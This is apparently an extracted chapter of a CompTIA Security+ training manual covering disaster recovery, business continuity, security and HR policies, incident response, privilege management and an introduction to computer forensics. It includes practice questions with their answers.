CompTIA Security+ Certification Business resumption and continuity plan The business continuity plan (BCP), also called the contingency plan, includes details about how to keep the business running when any key component fails. This information includes the personnel responsible for the recovery process, their assignments, the functions that must be operational first, and the process for reinstating key components. Typically, the BCP includes the following items: A responsibilities checklist for all members of the BCP team. This list should include contact phone numbers, responsibilities, and backup personnel. List of emergency contacts, such as police, fire department, utility companies, and top-level management. Warning system to notify customers and employees that an emergency has occurred and how the plan will proceed. Damage assessment, control, and containment procedures. Recovery procedures for critical systems. Location and access information for remote backup facilities or offsite operational facilities. Documentation The disaster recovery plan requires that each phase of disaster recovery be carefully documented. Instructions should be concisely worded so that anyone can follow them without further clarification. The documentation should include the following: System configurations for all servers, firewalls, routers, and other key network devices. Include any major modifications done and all patches applied since the systems were placed into production. Also, remember to include key passwords. This document is necessary to restore all vital applications. Networking and facilities diagrams. Include diagrams or blueprints of all networking and facilities infrastructure so that it can be re-created at a new site. Vendor and supplier lists, in case new equipment needs to be ordered to replace compromised or damaged equipment. This document should also include procedures to assist in a rapid acquisition process. The documented backup plan as defined earlier in this unit. The backup procedures must be exhaustively documented with step-by-step instructions on how the backups are done, when they are done, and what information is included. This level of documentation is critical if the systems have to be reconstructed quickly to restore business functionality.
Document storage
All of these documents must be stored in multiples sites: on a hard drive that is consistently backed up; as hard copies stored in various secured cabinets or safes in various offices; and at the offsite storage facility. This redundancy is to ensure that a copy of the disaster recovery plan is accessible at all times should the need to retrieve it arise. This accessibility allows a rapid response to the disaster, thus helping to minimize the business continuity challenges. Note that all copies should be secured because the documentation will likely include key passwords, file structure documentation, and other mission-critical information that could be used to re-create data if necessary.
Disaster recovery and business continuity Do it!
169
A-1:
Discussing the disaster recovery planning process
Exercises
1 _________ backups will back up all files selected on a system, whereas _________ backups will save only those files that have been modified since the previous backup, and __________ backups will save only those files that have been changed since the last full backup.
Full, incremental, differential
2 What are media rotation and retention?

Media rotation is the frequency of reuse. Media retention is the amount of time a backup should be retained before the media are reused or destroyed.
3 The ____________ rotation method performs an incremental or differential backup every day of the week except Friday, when a full backup is performed. This allows you to retrieve files archived from the previous day, by using the weekly full backup and then restoring the incremental or differential backup(s). A
B
Son Father-son Grandfather-father-son Hot site
C D
4 What is a reciprocal backup agreement?

Two companies back up and store each others data, creating a cost-effective way to keep data safe and in separate locations.
5 Which of the following is an offsite facility that supplies a basic computing environment (wiring, ventilation, plumbing) but no computer hardware? A B
C
Hot site Warm site Cold site Reciprocal site
6 Which of the following documents are found in the disaster recovery plan? (Choose all that apply.)
A B C
A list of the covered disasters A list of the disaster recovery team members for each type of situation and their contact information A business impact assessment Code of ethics Backup and restore documentation
D
E

7 The disaster recovery team should include the following: (Choose all that apply.) A
B C
All network administrators A member of senior management Members of the Information Technology department All backup operators Representatives from facilities management Representatives from the user community
D
E F
8 What information is included in the business impact assessment?

The business impact assessment should include a comparison between the cost of failure and the cost of recovery and acceptable workarounds.
1611
Topic B: Business continuity

# 5.3 Objective Understand the security implications of the following topics of business continuity Utilities High Availability / Fault Tolerance Backups
Redundancy
Explanation Business continuity focuses on ways to continue your business activities despite equipment failure or destruction. One way to help protect an organizations assets is to have a good deal of redundancy built into all mission-critical systems. These backup systems will be capable of filling in for the main systems until the damage can be repaired. A company that cannot function after a data-loss disaster is a company that will most likely suffer an unrecoverable loss as a result.
Utilities
Discontinuation of utilities, such as electricity, water, and transportation, can greatly affect a companys operations. Natural disasters such as snowstorms and tornados can create blackouts and cause equipment failure and absenteeism of critical personnel. To continue normal business functions, administrators need to have contingency equipment and personnel on standby to continue business operations despite adversities. When power outages occur, uninterruptible power supplies (UPSs) can switch over to battery backup and keep attached devices running for up to several hours, allowing time for the administrator to execute a normal shutdown. Additional measures, such as using gas-operated generators, may be implemented to keep servers running. If telephone service is interrupted due to a disaster, then mobile phones and e-mail through broadband access offer alternatives. If postal mail delivery stops, you might need to arrange for mail to be delivered to a different branch office. The key is to identify critical services and provide an alternative method for each one.
High availability and fault tolerance

High availability refers to critical services or systems that must be available at all times. The goal is to keep those services running even during outages. Fault tolerance refers to the ability of your system to recover from software or hardware errors and failure. Fault-tolerant systems can immediately switch over to a redundant component or subsystem when one fails. Fault tolerance can be built into a server by adding a second power supply, hard drive, CPU, or other key component.

High availability is guaranteed through redundancy. When a company assures 99% availability, this implies that all its systems have a duplicate or fail-over system to compensate for any malfunction. This system allows services to continue uninterrupted until the primary server can be restored. Data must be synchronized on both the initial system and the fail-over system to ensure that the information is as up-to-date as possible. There are several technologies that ensure redundancy. Two commonly used technologies are server clustering and RAID systems. Server clustering Clustering is a technology in which several servers jointly perform a single task. Server clustering is also used for fault tolerance: when one server goes down, another takes over. Many newer operating systems, including Windows 2000 Advanced Server, Novell NetWare 6, and Linux, are capable of clustering to provide fail-over capabilities. RAID Redundant Arrays of Independent Disks (RAID) technology was developed to improve disk performance and to prevent the loss of data when a disk fails. RAID provides several methods of writing data across multiple disks and writing to several disks at once. RAID Level 0 (disk striping) uses multiple drives and maps them together as a single physical drive. This improves performance, but there is no fault tolerance. If any drive in the array fails, the entire logical drive becomes unusable. RAID Level 1 (disk mirroring) stores identical copies of the data on multiple disks. If one disk fails, another disk continues to operate. Additional fault tolerance is achieved by using separate disk controllers for each disk (this setup is called duplexing). This ensures 100% redundancy. RAID Level 3 (disk striping with a parity disk) writes data across three or more drives, but one drive is used to store the parity bits for each byte that is written to the other disks. When a disk fails, it can be replaced, and the data can be restored to it from the parity information. RAID Level 5 (disk striping with parity) stripes data across three or more disks, but parity information is spread across all the disks in the array, instead of being limited to a single disk.
Backups
As discussed previously, backing up your data is the most important measure you can take to ensure business continuity. Computers and network equipment can be replaced, but your data is irreplaceable. To prepare for possible disaster, back up your data on a daily basis and store a copy offsite.
1613
B-1:
Understanding business continuity

1 Define fault tolerance.
Fault tolerance is the ability of your system to recover from software or hardware errors and failure.
2 Why is redundancy critical in high-availability systems?

High-availability systems need to be available at all times. If a component of the system fails, there must be a fail-over system to assume the load until the primary system can be restored.
3 What is clustering?
Clustering is a technology in which several servers jointly perform a single task. Server clustering is also used for fault tolerance: when one server goes down, another takes over.
4 RAID Level __ stores identical copies of the data on multiple disks. If one disk fails, another disk continues to operate. Additional fault tolerance is achieved by duplexing (using separate disk controllers for each disk).
1
5 RAID Level __ writes data across three or more drives, but one drive is used to store the parity bits for each byte that is written to the other disks. When a disk fails, it can be replaced, and the data can be restored to it from the parity information.
3
Topic C: Policies and procedures

# 5.4 Objective Understand the concepts and uses of the following types of policies and procedures Security Policy Acceptable Use Due Care Privacy Separation of Duties Need to Know Password Management SLAs (Service Level Agreements) Disposal / Destruction HR (Human Resources) Policy Termination (Adding and revoking passwords and privileges, etc.) Hiring (Adding and revoking passwords and privileges, etc.) Code of Ethics Incident Response Policy
Information security policies

Explanation Besides creating a disaster recovery plan, organizations need to create and adopt a welldefined security policy and a human resources policy that reflects a commitment to information security.
Security policy
A security policy is a general statement produced by senior management and the Information Technology department to dictate what security means to the organization. The document should establish how the security program is organized, what the policys goals are, with whom responsibility falls, and what the strategic value of the policy is. An effective policy should include sections on acceptable use, due care, privacy, separation of duties, need-to-know issues, password management, service-level agreements, and the destruction or disposal of information and storage media.
Disaster recovery and business continuity Acceptable use
1615
Ask students what legal issues they think should be covered in the acceptable-use policyboth those that protect employees and those that protect the company. Some issues that should be discussed include sexual harassment, copyright, and piracy.
Acceptable-use policies address the use of computer equipment and network resources for personal use or use that is not benefiting the company. The goals of the policy are to meet productivity goals of the Human Resources department, meet liability concerns of the Legal department, protect critical information and technical resources, and maintain the security goals of the Information Technology department. Organizations have been concerned about the misuse of computer resources and its impact on business activity for some time. As Internet use has grown, so has the abuse of business resources for personal use. Many studies have focused on the impact this type of misuse has on productivity and the lost revenue associated with it. Lost productivity is not the only concern, however. Just as damaging are situations in which company information is compromised by employees using the Internet to communicate sensitive information to external parties, by the use of company resources to view sexually explicit or socially unacceptable Web pages, or when an organization is held legally responsible for promises made by an employee using the companys e-mail system. An acceptable-use policy should cover what is and is not considered appropriate use of company resources and time. The document should be read and signed by employees when they are hired, and held in the employee file in case of any future violations. The enforcement mechanism of the policy should also be well-established to ensure that all employees understand the consequences of their actions. Due care To exercise due care means that reasonable precautions are being taken; these indicate that an organization is being responsible. If a corporation were to experience a major security-related incident that escalated because of a lack of countermeasures or incident response, those who are adversely affected (shareholders, business partners, customers) may have grounds for suing on the basis of lack of exercise of due care. By establishing a solid security policy and adhering to its basic tenets, a company can prove that it has exercised due care and can protect itself from lawsuits. Privacy When implementing a security policy, managers must understand the necessity of protecting customer and supplier data. By securing this data, an organization can solidify the trust it has between itself and any external parties with confidential information on the organizations network. This information can consist of financial information, Social Security numbers, partner contracts, sale prices, and so forth. If an organization does not respect its clients and partners right to privacy, it can lose the trust of those parties, or in some cases face legal action for intentionally or unintentionally divulging that information.

Separation of duties In many organizations, the majority of networking and security knowledge tends to reside in one or several people. The question that arises in these situations is: What happens when that person or those people leave the organization? More than likely, that information will leave the company with them, and this results in a considerable effort to train another employee on the particular details of the network and its security mechanisms. The best way to alleviate this issue is to distribute tasks throughout the IT organization and to document processes thoroughly. That way, if an employee finds a new job or is fired, the learning curve for trainees is not so steep, and the security of the network is diversified to the point that one person cannot act alone to change or disable any piece of equipment. High-risk activities should be divided into components and distributed throughout the technology organization. By doing this, the company can reduce the level of trust it places on one person and does not subject itself to the high-risk situation in which one individual can act alone to change the network environment. Great care needs to be taken in this area to be sure that the business can continue in the event of a disgruntled employee damaging the network. Most network disasters are caused either by an error or by an employee that damages the network from the inside. Employees know where the network is vulnerable, and their knowledge of the business allows them to damage where it will hurt the most. Need to know Employees within the technology organization should be trusted with information on a least-privilege basis. Least privilege means that an individual should have just enough permission to carry out his or her job function. If a person has too many privileges, its much easier to put the company at risk. Need-to-know rights work in tandem with the concept of least privilege. Users should have access to only the information and resources they need to know about. If an individual doesnt need to know about the sales proposal process, then his credentials should reflect that fact. The decision as to who is allowed access to certain information should be made by upper management, Human Resources, and IT management. Password management Password management is necessary to protect the confidentiality of information and the integrity of systems by keeping unauthorized users out of computer systems. Password protection of computers and networks is widely used. Not all organizations, however, realize the risks they are taking by having poor password policies. These risks include user confusion, system denial-of-service issues, and user education problems if the policy is not communicated clearly. Password management policies may vary in their complexity depending on the perceived need to secure the companys assets. Many password policies specify attributes and procedures for handling user passwords. Among these attributes are: minimum length, allowed character set, disallowed strings (all numbers, dictionary words, variations of the user name or ID), and the duration of use allowed. The password policy should include human factors to ensure the integrity of a users password. For example, only the employee who needs access to the resource should know the password, and the user must change any assigned passwords immediately. This reduces the chance for illicit account access and allows for traceability and accountability of employee actions on the network.
The bottom line here is that nobody in the organization should be seen as irreplaceable, because one day he or she likely will be replaced, and the smoother the transition, the better. Explain that many employees purposely provide poor documentation of their work so that it will be that much harder to know how to replace their duties. The company may then have a dilemma: pay this person what he/she demands, or incur the costs of lost productivity when he/she leaves. The best strategy is to incur the costs and make sure the next person does not leave you in such a predicament.
1617
The plan should also include training on proper password procedures. IT management may want to use password-scanning tools to find weak passwords. If weak passwords are found on the system, the users responsible for the weak passwords should be notified and instructed on how to create stronger passwords. Service-level agreements A service-level agreement (SLA) is a contractual understanding between a service provider and the end user, which binds the provider to a specified and documented level of service. A well-constructed SLA should include specific levels of service and support and should include penalty clauses in the event that the services or support are not provided. An organization should specifically request a disaster recovery plan with any SLA. If the service provider goes down or has a service interruption, all organizations using the service could suffer as if the outage were their own. Backup plans need to be in place in case of a provider failure. These plans must include a short-term solution to ensure business continuity during the initial recovery period. Disposal and destruction Many companies that have established strong system-access guidelines carelessly dispose of documents, systems, and media that contain data or could potentially help to compromise systems. Most people do not consider the need to properly dispose of old storage media and unused equipment. Deleting files, reformatting, and overwriting disks does not completely eliminate all information. The best way to dispose of important information or hardware that contains such information is to have the medium degaussed. Degaussing is the process of demagnetizing the media so all information is rendered useless. Another technique that effectively disposes of data is zeroization, which overwrites all data with zeros. A more extreme approach is physical destruction, whether that means breaking floppy disks and destroying the magnetic disk inside or physically destroying equipment. This is often the surest way to dispose of critical information. In addition to disposing of storage media and unused equipment, companies need to destroy hard copies of any vital information by shredding, pulping, or burning it. An emergency destruction plan should be in place when organizations work with highly sensitive information such as data that is vital to national security, or work with the Department of Defense or other government agencies.

Do it!
C-1:
Discussing the security policy

1 What is the purpose of acceptable-use policies?
Acceptable-use policies address the use of computer equipment and network resources for personal use or use that is not benefiting the company.
2 Why is separation of duties an important measure to consider when developing a security policy?
Distributing high-risk activities among the technology community reduces the level of trust it places on one person and prevents a disgruntled employee from doing extensive damage to the network.
3 What is the purpose of due care?

The purpose of due care is to demonstrate that an organization is being responsible in order to protect itself against lawsuits.
4 A password policy should include the following attributes: A B C D

E
Minimum length Allowed character set Disallowed strings Duration of use of the password All of the above
1619
Human resources policy

Explanation Regardless of how redundant an organizations hardware is, if an organization does not have the right human resources in place, the entire security plan can be rendered worthless. Too often, many organizations tend to have one individual on staff who knows everything about the network and its security. To be more effective, an organization should distribute knowledge throughout the technology organization in case something happens to the one person with the most information. The best way to deal with this issue is to cross-train technology staff. This helps continuity if one person is promoted to another job function, or if someone leaves the organization altogether. Another important consideration is to train personnel to manually perform tasks that are normally automated, should it be necessary during a failure. When youre thinking about personnel management and how it relates to security, its helpful to break the process down into three parts: pre-employment, employee maintenance, and post-employment. Employee hiring Many organizations have very thorough hiring practices. When management is considering hiring personnel for computer network or security functions, its even more vital to verify the candidates background, including reference checks, previous employers, criminal background checks, and relevant educational background. Some hiring managers even require character evaluations as part of the process to make sure that the person is reliable and can be trusted with the roles and responsibilities within the technology organization. If the role being filled is a critical role, such as security manager, a background investigation may be in order. Having people on staff who can be trusted with critical information is just as important as having the most up-to-date security hardware and intrusion detection systems. Employee maintenance Once a person is hired for a position, there are several ways to minimize the risk that security is not compromised. Periodic reviews are helpful in evaluating an individuals performance; furthermore, such reviews are also useful in identifying potential security risks. As part of the periodic review process, all security clearances should be reevaluated. Should a security clearance need to be changed, it should be done so immediately. To help mitigate security risks, it may be advisable for management to implement a policy of job rotation and separation of duties. By rotating people in and out of specific job functions, the organization benefits by more evenly distributing information; this is primarily of use in an emergency. At the same time, its equally vital that job duties be separated effectively so one person cannot compromise the security of the network and critical information.

Employee termination Employee attrition is a fact of life. Within any organization, people will leave for new opportunities elsewhere or may be terminated. When such an event happens, an effective post-employment procedure should be followed. The process should be made as friendly as possible to avoid feelings of ill will. Disgruntled employees can act maliciously and can be a threat to information security. Exit interviews should be conducted professionally, and all security badges and company property should be received from the former employee. When the exit interview is complete, the individual should be escorted off of the property, making unauthorized access to the computer network unlikely. As the final step in the process, technology personnel should deactivate the former employees various computer accounts and change any passwords that are affected. Code of ethics As part of the human resources policy, a code of ethics can help define the companys stance on information security. The code should demand that employees act honestly, responsibly, and legally to protect the organization. Employees should be asked to work diligently and provide competent services to all customers, suppliers, and fellow employees. The code should also discourage unsafe practices and preserve and strengthen the integrity of the organization. Employees should observe and abide by all contracts, expressed or implied, avoid any conflict of interest, and take on only the jobs he or she is qualified to perform. By laying groundwork in ethics as the basis of a human resources policy, an environment that is conducive to maintaining the integrity of a companys security can be created over time. Do it!
C-2:
Discussing the human resources policy

1 List three human resources policies that will minimize potential security risks among employees.
Conduct periodic reviews. Reevaluate security clearances and change them if needed. Implement a policy of job rotation and separation of duties.
2 Which of the following tasks should be performed with an employees termination? (Choose all that apply.)
A B
Conduct exit interviews professionally. Collect security badges and company property. Change all locks on the building. Escort the employee off the property. Deactivate the employees accounts and change passwords.
C
D E
3 Why should a human resources policy include a code of ethics?

It lays the groundwork in ethics and creates an environment conducive to maintaining the integrity of a companys security.
1621
Incident response policy

Explanation An incident response policy covers how to deal with a security breach or a disaster after it has already transpired. Incidents can be any number of adverse events affecting a network, including unauthorized access, denial or disruption of services, viruses, system failures, or attempts to breach the policies or security of an organization. How people and automated processes respond to incidents has strong legal repercussions. As mentioned earlier, an organization must exhibit due care when handling client information. If any compromising incident gets out of control, it can become increasingly costly and complicated. This is especially true if the escalation of the incidents can be linked to incompetent decisions and actions made in responding to an incident. Following a sound incident response methodology lessens the likelihood that incompetent and inefficient actions will occur. Adopting an incident response methodology contributes to the practice of due care. The best way to establish an incident response policy is to follow six distinct steps: 1 Preparation 2 Detection 3 Containment 4 Eradication 5 Recovery 6 Follow-up Preparation Preparation is essentially being ready before an incident occurs. Allocation of sufficient resources must be central to any incident response policy in order to achieve a balance between the extremes of easily accessible systems with strong incident response versus strong controls without incident response. Its also important to ensure that the systems and applications used in handling incidents are themselves resistant to attack. Create a set of procedures to deal with incidents as efficiently as possible. Outline the specific steps to be taken by those people involved in incident response and under what circumstances each step should be taken. The policy should also contain a contact list of the people involved and the types of information to be shared. The preparation process should also include acceptable risk limits and approved documentation processes. Dedicated hardware platforms should be used for incident analysis and forensics, and the necessary personnel should be appropriately trained to handle these situations. As with most other areas, due diligence up front will go a long way toward helping the business survive in the event of a data disaster. Having well-thought-out contingency plans and determining the acceptable levels of risk up-front will help ease any organization through a difficult time. Detection When an incident arises, the first thing the response team should do is evaluate and determine the potential cause of the incident. The incident can be caused by various events, including hardware failure, network failure, software error, loss of utilities, or malicious code. Estimating the scope of the incident helps the response team deal with the situation. Questions to consider are: How many hosts were compromised, and how many networks? How far into the internal network did the intruder get? What level of privileges were accessed? What is at risk? How many avenues of attack were present? Who knows about the incident? And how widespread is the vulnerability? All of this information should be thoroughly documented and reported.

The reporting process should include an explanation of the types of information to be reported, including the basic information about the incident, the type of incident, the resources involved, the origins of the attack or failure, the consequences of the attack or failure, and the sensitivity of the compromised information. All of this information should be reported to the CIO, affected personnel, the Public Affairs department, the incident response team, government agencies, and the Legal department. The policy should also address how quickly this information is to be disseminated and the type of method used for transmission, such as secure e-mail or hard copy. Containment Containment techniques vary and should be assessed on a case-by-case basis. Shutting down a system is a drastic measure, but its sometimes warranted to prevent further loss or disruption of service. To contain the situation, you might need to remove a piece of compromised hardware from the network and change the filtering rules on any firewalls or routers. It may also be necessary to disable or delete compromised login accounts. Its advisable to increase the level of monitoring on the system and to disable services such as file transfer services. In cases of malicious attack, its important to immediately stop using any compromised equipment or data to prevent further damage. Remove the compromised hardware from the network, and let the appropriate people analyze what happened. Any information that is gleaned can be used to prevent further attacks or to identify the culprit. Eradication Once the incident is contained, its necessary to eradicate the cause of the incident. There are many software programs that can detect viruses or malicious code. After these files are gone, it may be necessary to clean and reformat any hard drives that were affected by the incident. When youre restoring the data to the reformatted drives, ensure that the backups are clean and virus free. Recovery The recovery process can take place after all malicious data is removed from the system. In case new equipment needs to be ordered to replace compromised or damaged equipment, procedures should be in place to identify suppliers (and their contact information) to assist in a rapid acquisition process. If the compromised equipment is mission critical and could cause the business to come to a standstill, the plan should allow for borrowed or vendor-sponsored equipment to be reinstalled quickly. This will help the business to continue during the recovery process. A full system restore can be difficult and time consuming, yet it offers the highest level of assurance that systems and network components have been returned to normal operational status. Make sure to change all passwords following an event because its very difficult to know whether any passwords were compromised. When recovering data, restore from the most recent full backup, and use fault-tolerant system hardware to recover mirrored data that resided on the redundant hard drives. Follow-up To help those involved in the incident develop a set of lessons learned, your organization might want to have a follow-up strategy. By documenting the entire process, the incident response team can provide information that can help justify an organizations incidence response effort and security policy. Lessons learned can also act as training material for new team members and can be leveraged should there be legal proceedings because of the incident.
1623
C-3:
Discussing incident response policy

1 Which of the following are actions to be taken during the preparation phase of incident response? (Choose all that apply.) A
B C D E
Use IDS to detect malicious code and analyze anomalies. Allocate sufficient resources to support an appropriate level of incident response. Ensure that the systems and applications used in handling incidents are resistant to attack. Identify who is to be contacted in the event of an incident, and list their responsibilities. Establish acceptable risk limits.
2 List some methods of containment that should be considered in response to an incident.

Shut down the compromised system. Remove compromised hardware from the network. Change the filtering rules on a firewall or router. Disable or delete compromised login accounts. Increase the level of monitoring on the system. Disable unnecessary services.
Topic D: Privilege management

# 5.5 Objective Explain the following concepts of privilege management User / Group / Role Management Single Sign-on Centralized vs. Decentralized Auditing (Privilege, Usage, Escalation)
Privilege management systems

Explanation Over the past five years, technology has made it easier to secure an organizations computer and network information. One of the best ways to secure information stored on a network is to carefully manage access to that information. By managing employee or user access to information, security managers can limit the opportunities for security breaches. Privilege management is the process of assigning access to network resources. It involves determining what information is accessed, who may access it, and to what extent. The purpose of privilege management is to grant each user access to the specific resources needed to accomplish his or her job, and no more. A well-thought-out privilege management system can go a long way to help secure mission-critical information. Most organizations use access control lists to accomplish privilege management. The following sections describe some of the tools and technologies that assist in establishing these access control lists.
User, group, and role management

The task of assigning rights and privileges to users and devices can be daunting. If you are responsible for an enterprise-wide network, you may have hundreds of users needing access to thousands of files. The simplest way to accomplish the task is to group users by some criteria, typically by department, project, or job title, and then assign permissions to each group. User management User management is the process of assigning access permissions to a particular user. This process creates very granular security and is typically performed by the file owner, and not the administrator. When a user creates a directory or file, he or she becomes the owner. The owner can determine who else can have access to the directory or file. Unless an owner explicitly grants administrative (Modify or Full Control) privileges to another person, no one can change the permissions on that file.
Disaster recovery and business continuity Group management
1625
Managing privileges for a group is essentially the same as managing privileges for an individual, except that you have a single entry in the access control list instead of many. The administrator creates a group, assigns members to the group, and then grants group privileges to all required network resources. Each member within the group automatically inherits all privileges granted to that group. Thus, if the Accounting group is granted Read/Write access to data within the Accounts Payable folder, any new employee added to the Accounting group automatically receives Read/Write privileges as well. Users can be members of several groups at once. The privileges assigned to each group of which the user is a member are combined to create the users effective permissions. Role management Some network OSs, such as Novell NetWare and Microsoft Windows 2000, allow the administrator to control access through roles. The administrator creates a role to represent a particular position or function within the organization, and then assigns resource privileges on a need-to-use basis. For example, an insurance company can create roles that include claims adjuster, actuary, underwriter, and account executive. Once the role is created, a user is assigned to the role, thereby inheriting all permissions granted to the role.
Centralized vs. decentralized administration

Before the advent of directory services, administrators had to create a separate user account on each computer that was servicing the user. Thus, if a user needed to use resources (files, printers, e-mail, etc.) located on four computers, the administrator would need to create four user accounts and assign the appropriate privileges. The administrator typically would have to be physically present to manage access to the server. This setup is known as decentralized management because each server controls access to its own resources, and administrators have to set up accounts on each server. The standard today, especially within large networks, is to establish a single account within a directory service, and then force each server to check the directory service for authentication or authorization. This centralized approach to management reduces the workload of the administrator both in setting up the accounts and in troubleshooting them later.
Single sign-on
Single sign-on (SSO) allows a user to log onto several servers or applications by using a single logon sequence. This eliminates the necessity to memorize a different password for each application. In addition, the administrator can manage the user accounts from a single, central location. Most network operating systems today provide some means of SSO. Microsoft and Novell use directory services to accomplish the single sign-on. The directory service issues a digital certificate after authentication to grant access to all authorized services within the directory. Alternatively, applications using Kerberos issue session tickets that can be used repeatedly to transparently sign onto other systems.
1626 CompTIA Security+ Certification Auditing

For security policies and procedures to be truly effective, they must be audited to assess their efficacy. Auditing ensures that employees are conforming to company standards, and it establishes accountability. The auditing process logs specific events for review. Depending on the operating system or application, servers and network devices can monitor a wide range of activities, including the status of services and devices, user attempts at login, files opened and modified, and even Web sites accessed by employees. Regular monitoring of these logs can help determine whether there were any lapses in security. Limit auditing to significant items. Auditing introduces an additional load on the server and affects performance. In addition, the person reviewing the logs must scan through a high volume of information to locate the required information. Privileges By reviewing the successes and failures of accounts accessing files, printers, and other network resources, the administrator can determine whether incorrect permissions have been set. Conversely, if a user can change accounts, restart and shut down systems, and perform other restricted activities, the administrator can assume that more liberal privileges were granted than were intended. Without periodic auditing of these events, the administrator would never know to correct the problem. Usage Monitoring login and logoff failures can indicate that someone is trying to hack into your system by using an authorized account. Other logs of system usage can indicate when user or group account information was modified or when sensitive files were updated and by whom. In addition, audits can be used to identify violations of corporate policy. This process can include scanning workstations for unlicensed software and logging employee access to unauthorized Web sites. Escalation Finally, auditing can monitor system performance and deter a system failure caused by a surge in service requests. Escalation audits can identify irregular patterns in usage, such as the use of accounts at night, unusual spikes in CPU usage, and excessive network traffic. The administrator is forewarned to investigate these irregular patterns and can take remedial action before a system failure occurs.
1627
D-1:
Discussing privilege management

1 What is privilege management?
Privilege management is the process of assigning access to network resources. It involves determining what information is accessed, who may access it, and to what extent.
2 ______________ describes the privileges assigned to a particular user. By default, the file owner receives full control of any files or directories that he or she creates.
A
User management Group management Role management MAC
B C D
3 What is the purpose of auditing?

Auditing assesses the efficacy of security policies and procedures. It ensures that employees are conforming to company standards, and it establishes accountability.
4 Single sign-on allows a user to log onto several servers or applications by using a single logon sequence. True or false?
True
Unit summary: Disaster recovery and business continuity

Topic A In this topic, you learned how to develop a disaster recovery plan. You learned that there are several distinct steps to documenting the plan: identifying covered disasters, listing the disaster recovery team members and their roles; assessing the impact of each potential disaster on business continuity; documenting systems, network architecture and facilities; and developing a continuity plan. You also explored the elements of a constructing a data backup plan and selecting an offsite facility. In this topic, you learned that the disaster recovery plan must allow the business to continue through whatever catastrophic event might occur. You learned the importance of fault-tolerance and redundancy in assuring fail-over when systems fail. You also examined two technologies that promote redundancy: server clustering and RAID. In this topic, you learned how to create and adopt a well-defined security policy, human resources policy, and incident response policy. You learned how important the concepts of due care, acceptable use, privacy, separation of duties, need to know, and code of ethics are in promoting a conscientious environment as regards security. You also learned the proper precautions a Human Resources department should take to evaluate employees during the hiring, review, and termination phases. In addition, you learned that the incident response policy provides a step-by-step procedure for dealing with a security incident after it occurs. In this topic, you learned that one of the best ways to secure information on a network is to carefully manage access to that information. By managing employee or user access to information, security managers can limit the opportunities for security breaches.
Topic B
Topic C
Topic D
Review questions
1 Outages can be caused by various events. What are they? A Hardware failure B Network failure C Software error D Malicious attack
E
All of the above
2 The best way to establish an incident response policy is to follow which distinct steps? (Choose all that apply.)
A B
Detection Containment
C Backup
D E
Preparation Eradication
F Auditing
1629
3 A disaster recovery plan defines the resources, actions, and data required to reinstate critical business processes that have been damaged or disabled because of a disaster. True or false?
True
4 Accidental threats are loss of power, transportation accidents, chemical contamination, and so forth. True or false?
True
5 What are the three main types of backup facilities?

A
Hot site
B Neutral site
C D
Warm site Cold site
E Freeze site 6 An advantage of a hot site is that the site is ready for operation within hours. True or false?
True
7 A warm site has no hardware infrastructure, is not immediately available, and operational testing is not available. True or false?
False. This describes a cold site.
8 How far away from your organization's current location should an alternate site be minimally located?
50 km
9 An effective backup strategy should take into account what key issues? A How often should the backups be run? B What is the backup medium? C How long will backups be stored? D Will the backups be manual or automated? E How will backups be verified?
G
All of the above
10 An incident response policy is a written policy that covers how to deal with a security incident after it has transpired. True or false?
True
11 Privacy policies are not legally enforceable, so they give consumers no recourse if their information is misused. True or false?
False. They are legally enforceable.

12 When a situation arises, the first thing the disaster recovery team should do is to determine and evaluate the potential sources of the outage. True or false?
True
13 A full system restore can be difficult and time consuming, yet it offers the highest level of assurance that systems and network components have been returned to normal operational status. True or false?
True
14 Adopting an incident response methodology constitutes the practice of due care and, if need be, can be established as such in a court of law. True or false?
True

A good incident response policy includes a section outlining example incidents and corresponding responses. Using XYZ, Inc., located in Rochester, New York, as your model organization, document an appropriate response plan for one of the following incidents: A severe winter storm has disabled your network and stopped all normal business activity. A hacker has just broken into your system via an active FTP session. Nothing has been compromised yet. Worm.ExploreZip has been detected on your system. This worm is known to use Microsoft Outlook, Outlook Express, and Exchange. A suspicious person has been reported loitering outside the administration building and rummaging through the garbage bins. Several times, he has tried to enter the building as employees enter and exit, but he has so far been unsuccessful.
171
Unit 17 Computer forensics and advanced topics

A Apply computer forensics to investigate
network security incidents.

B Explain the concepts of assets,
vulnerabilities, and threats as they relate to risk management.

C Promote user education and training as
essential elements in network security.

D Describe the role of auditing in network
security.
E Explain the importance of documentation
in enabling systems management and security.
172
Topic A: Understanding computer forensics

# 5.6 Objective Understand the concepts of the following topics of forensics Chain of Custody Preservation of Evidence Collection of Evidence
Acquiring and analyzing evidence

Explanation Computer forensics is the acquisition and analysis of evidence pertaining to a computer security incident. Information gathered from the investigation can be used to recover or patch the compromised system, reconstruct corrupted data files, support prosecution of potential criminal activity, and prevent similar future breaches. Specialists in computer forensics combine experience plus deductive and inductive reasoning skills with sophisticated software tools to isolate security holes, identify the modes of access, and detect clues for evidence of a cyber crime or security breach. Established safeguards and computer forensics methodologies ensure maximum recovery of data and preservation of digital evidence to support civil or criminal litigation.
Digital evidence
Digital evidence is essentially information and data of investigative value that is stored on or transmitted by an electronic system such as a computer. Such evidence is acquired when data, media, or hardware are collected and stored for examination purposes. Digital evidence is: Extremely volatile and susceptible to tampering Often concealed Sometimes time sensitive A knowledgeable expert that identifies possibilities that can be requested as relevant evidence can help speed up the discovery process during forensic investigations. For cases where computer disks are not actually seized or forensically copied, the forensics expert can more quickly identify places to search, signs to look for, and other potential information sources to be used as evidence during on-site inspections. Such evidence may take the form of earlier versions of data files that may still exist on computer hard disk drives, backup media, or differently formatted versions of data, either created or treated by applications (such as word-processing programs, spreadsheets, e-mail, graphic, or the like).
Principles of digital evidence

During the International Hi-Tech Crime and Forensics Conference (IHCFC) of October 1999, the International Organization on Computer Evidence (IOCE) held meetings and a workshop to review the United Kingdom Good Practice Guide and the Draft Standards of the Scientific Working Group on Digital Evidence (SWGDE).
173
The Working Group proposed the following principles for collection, preservation, and access of digital evidence, which were voted upon by the IOCE delegates and gained unanimous approval: Investigation and analysis performed on the seized digital evidence should not change the evidence in any form. Except where necessary, evidence should only be manipulated and analyzed on a copy of the original source, leaving the actual violated data and hardware intact. An individual must be forensically competent in order to be given permission to access original digital evidence. Several organizations have created training programs and certificates in computer forensics, although none have emerged as a de facto standard. Despite this, there are a set of widely accepted methods and practices that are common to most programs and should be applied by any forensic analyst. All activity relating to the seizure, access, storage, or transfer of digital evidence must be fully documented, preserved, and available for review.
Forensic process
